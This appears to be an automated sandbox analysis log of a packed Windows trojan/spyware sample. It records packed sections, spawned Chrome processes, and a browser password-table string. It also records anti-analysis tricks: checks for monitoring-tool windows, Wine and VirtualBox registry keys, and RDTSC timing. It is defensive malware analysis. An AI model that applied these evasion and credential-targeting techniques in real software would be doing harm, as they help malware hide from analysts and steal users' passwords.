                Source: file.exe, 00000000.00000003.2454020540.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2449122660.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445605633.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2454302852.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2455045310.0000000005D94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2455965872.0000000005EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439279134.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451675752.0000000005C57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2447741007.0000000005D5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2463252271.0000000005DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444988732.0000000005D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442108570.0000000005D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2461543066.0000000005C5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2462949075.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444712425.00000000057C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2437953137.00000000058A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443300343.0000000005D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442021911.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452151574.0000000005D87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441100825.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2449746692.0000000005D68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2454154402.0000000005D95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452247526.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452917169.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2460611541.0000000005F0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2461794554.0000000005DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9977408854166666
                Source: file.exeStatic PE information: Section: kavxkxnu ZLIB complexity 0.9942556527944711
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@9/7
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000003.2221786277.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197645067.00000000057A5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197131563.00000000057D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 44%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=1616,i,1849646799519399230,5755203485963844661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2060,i,10926334977255808972,13126981693382377171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=1616,i,1849646799519399230,5755203485963844661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2060,i,10926334977255808972,13126981693382377171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 1872896 > 1048576
                Source: file.exeStatic PE information: Raw size of kavxkxnu is bigger than: 0x100000 < 0x1a0000
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb0a4 should be: 0x1cab2d
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: kavxkxnu
                Source: file.exeStatic PE information: section name: myhjcrzc
                Source: file.exeStatic PE information: section name: .taggant
                Source: file.exeStatic PE information: section name: entropy: 7.978612481813435
                Source: file.exeStatic PE information: section name: kavxkxnu entropy: 7.953931606377355

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AFDD second address: 54AFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F66C0B351F6h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D29B7 second address: 6D29C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jno 00007F66C0B35946h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D29C5 second address: 6D2A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jg 00007F66C0B35206h 0x0000000d jmp 00007F66C0B35200h 0x00000012 jbe 00007F66C0B35208h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D30DD second address: 6D30F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35950h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D30F5 second address: 6D30F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D30F9 second address: 6D30FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D566C second address: 6D5672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5672 second address: 6D5676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D597E second address: 6D59AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007F66C0B35217h 0x00000011 pushad 0x00000012 jmp 00007F66C0B35209h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D59AB second address: 6D5A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F66C0B35955h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 jmp 00007F66C0B35951h 0x00000016 pop eax 0x00000017 pop eax 0x00000018 mov dword ptr [ebp+122D2163h], ecx 0x0000001e and edx, dword ptr [ebp+122D280Bh] 0x00000024 lea ebx, dword ptr [ebp+1245E4CFh] 0x0000002a or dword ptr [ebp+122D1BFFh], eax 0x00000030 mov dh, 47h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pop eax 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5A00 second address: 6D5A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5A04 second address: 6D5A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5A0A second address: 6D5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8431 second address: 6C8436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8436 second address: 6C843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3B25 second address: 6F3B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3B29 second address: 6F3B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FCh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3B3B second address: 6F3B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F66C0B3594Eh 0x00000008 jmp 00007F66C0B3594Fh 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3B60 second address: 6F3B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4296 second address: 6F429C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4706 second address: 6F470C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F470C second address: 6F4710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA89B second address: 6EA8E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F66C0B351F6h 0x00000009 jmp 00007F66C0B35209h 0x0000000e jnp 00007F66C0B351F6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jl 00007F66C0B351F6h 0x00000020 pop esi 0x00000021 jmp 00007F66C0B35204h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4871 second address: 6F4875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4875 second address: 6F487B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F487B second address: 6F4895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66C0B35953h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5148 second address: 6F5158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5158 second address: 6F515E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F52D7 second address: 6F52F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35204h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F52F5 second address: 6F52FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA702 second address: 6FA708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8F5E second address: 6F8F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
